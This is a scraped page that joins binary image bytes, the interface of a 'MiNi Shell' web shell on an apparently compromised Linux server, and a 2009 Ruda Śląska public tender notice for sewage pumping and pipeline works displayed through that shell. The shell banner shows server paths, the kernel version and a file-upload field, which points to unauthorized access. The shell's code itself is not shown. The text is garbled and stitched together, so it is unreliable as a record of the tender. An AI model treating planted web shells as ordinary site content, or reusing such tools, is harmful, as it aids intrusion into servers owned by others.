JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/23509-N-2009.html

<p class="kh_header"><b>Ruda Śląska: Odprowadzenie ścieków sanitarnych z budynków w rejonie ul. Piłsudskiego - część południowa do Oczyszczalni Barbara w Rudzie Śląskiej - Kochłowicach</b><br>
<b>Numer ogłoszenia: 23509 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Ruda Śląska , Plac Jana Pawła II 6, 41-709 Ruda Śląska, woj. śląskie, tel. 032 2486281 do 9, w. 1291, faks 032 248 7348.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ruda-sl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odprowadzenie ścieków sanitarnych z budynków w rejonie ul. Piłsudskiego - część południowa do Oczyszczalni Barbara w Rudzie Śląskiej - Kochłowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje wykonanie.:

1.1  Kompletnej przepompowni ścieków składającej się z:
 a)  części montażowej  tj. zbiornik żelbetowy o śr.3000 mm z pełnym wyposażeniem zgodnie z rys. nr 14S oraz stosowna rozdzielnica zasilająco-sterująca i przepływomierz elektromagenetyczny DN150  (zakup, dostawa i uruchomienie)
b)  części budowlanej wraz z wjazdem,  ogrodzeniem i placem
c)  części elektrycznej wraz z oświetleniem terenu oraz zakupem, dostawą i uruchomieniem agregatu prądotwórczego
1.2. Kanałów grawitacyjnych z rur PCV:
       dn  315 mm  -   375,00 mb
       dn  200 mm  -   595,50 mb   +     1221,00 mb
       dn  160 mm  -    91,50 mb     +      267,00 mb    

1.3. Rurociągu tłocznego od przepompowni do projektowanej studni rozprężnej przy
       skrzyżowaniu ul.Piłsudskiego z ul.Grzybową
       rurociąg z PEHD  dn160 mm;   dług.482 mb 

1.4. Odtworzenie nawierzchni jezdni i chodników po robotach kanalizacyjnych.

Przewiduje się realizację zadania w dwóch etapach wyszczególnionych w dokumentacji technicznej, ze względu na wysokość środków w budżecie miasta na rok 2009.
Zakres prac oraz odpowiedzialności wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje również:
a) udzielenie gwarancji na wykonane roboty na okres min. 3 lat od daty odbioru końcowego   za wyjątkiem zabudowanych urządzeń w przypadku których okres gwarancji będzie zgodny   z gwarancją udzieloną przez ich producenta, 
b) organizacja robót  (w tym wykonanie organizacji ruchu),  zagospodarowanie i utrzymanie zaplecza budowy, opracowanie planu BIOZ który należy przedłożyć zamawiającemu najpoźniej 7 dni przed rozpoczęciem robót,
c) pokrycie wszystkich kosztów związanych z przyjętą technologią robót (np.za zajęcie pasa drogowego i chodników, zabezpieczenie wykopów, koszty wywozu gruzu, opłaty  administracyjne itp.)
d) zapewnienie pełnej obsługi geodezyjnej (wykonanie pomiaru inwentaryzacyjnego przed rozpoczęciem robot, wytyczenie obiektów, pomiary przed odbiorami poszczególnych   etapów robot itp.) 
e) zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów, w trakcie odbioru  technicznego przeprowadzenie monitoringu wraz z dokumentacją fotograficzno-filmową  i opisem stanu technicznego
f)  załatwienie wszelkich formalności z administratorami terenów,
g) wykonanie dokumentacji powykonawczej łącznie z inwentaryzacją geodezyjną i  naniesieniem sieci do zasobów geodezyjno-kartograficznych po zakończeniu każdego z etapów
h) po zakończeniu robót doprowadzenie terenu budowy do stanu pierwotnego (demontaż  obiektów tymczasowych, uporządkowanie terenu, odtworzenie zieleńców, dróg, chodników  itp.)  oraz uzyskanie oświadczeń właścicieli działek o doprowadzeniu terenu do stanu pierwotnego,
i) przygotowanie harmonogramu realizacji, który będzie stanowić załącznik do umowy. 

W związku z tym, że teren inwestycji jest objęty eksploatacją górniczą przed rozpoczęciem budowy Wykonawca jest zobowiązany do zweryfikowania rzędnych terenu po trasie projektowanej kanalizacji (w szczególności należy sprawdzić różnicę poziomów pomiędzy zaprojektowaną  przepompownią a najbardziej oddaloną studnią kanalizacyjną).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.10.00-5, 45.23.24.00-6, 45.23.24.23-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości:   25 000,00 zł
Słownie złotych: dwadzieścia pięć  tysięcy złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą udział Wykonawcy, którzy spełniają warunki z art. 22 ust. 1 ustawy, tj. 
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają taki obowiązek oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy
1.2. Posiadają niezbędną wiedzę i doświadczenie, oraz dysponują lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
1.2.1.	Wykonawca musi wykazać, iż w ostatnich 5 latach przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum  2  porównywalne roboty budowlane polegające na wybudowaniu:
-  przepompowni ścieków wraz z rurociągiem z rur PE o minimalnej śr.90 mm i dług.min.100 mb
-  kanalizacji grawitacyjnej z rur PCV o minimalnej  śr.200 mm i dług. min. 500 mb
-  drogi z asfaltobetonu o pow. min.2000 m2  oraz chodnika z kostki o pow.min.1000 m2. 
Dopuszcza się aby ww. roboty budowlane były wykonane łącznie bądź w ramach oddzielnych robót 
1.2.2.	Wykonawca musi wykazać, iż dysponuje lub będzie dysponował osobą lub osobami do wykonania niniejszego zamówienia posiadającą lub posiadającymi  potwierdzone przygotowanie zawodowe do wykonywania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności:
- instalacyjnej w zakresie sieci kanalizacyjnych
- instalacyjnej w zakresie sieci  instalacji i urządzeń elektrycznych i elektroenergetycznych
- konstrukcyjno-budowlanej drogowej
1.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia); nie spełnienie chociażby jednego z postawionych warunków udziału w postępowaniu, spowoduje wykluczenie Wykonawcy z postępowania.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie niniejszego zamówienia, o których mowa w art. 22 ust. 1 ustawy.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej. 
3. Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (roboty porównywalne określone powyżej) z podaniem ich wartości oraz daty i miejsca 
wykonania
4. Dokumenty (np. referencje) potwierdzające, że roboty budowlane, o których wyżej mowa, zostały wykonane należycie
5. Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności
6. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej  Wykonawca wskazał osoby, którymi będzie dysponował
7. Uprawnienia budowlane oraz aktualne zaświadczenia o przynależności do właściwego samorządu zawodowego wraz z informacją o opłaceniu obowiązkowych składek od odpowiedzialności cywilnej (np. zaświadczenie z Okręgowej Izby Inżynierów Budownictwa itp.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Okres udzielonej gwarancji - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rudaslaska.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ruda Śląska, pl. Jana Pawła II 6,41-709 Ruda Śląska, Wydział Zamówień Publicznych, budynek A, I piętro, pokój 129
Koszt SIWZ: 388,00 zł plus koszty przesyłki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2009 godzina 10:30, miejsce: Urząd Miasta Ruda Śląska, pl. Jana Pawła II 6,41-709 Ruda Śląska, Wydział Zamówień Publicznych, budynek A, I piętro, pokój 129.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com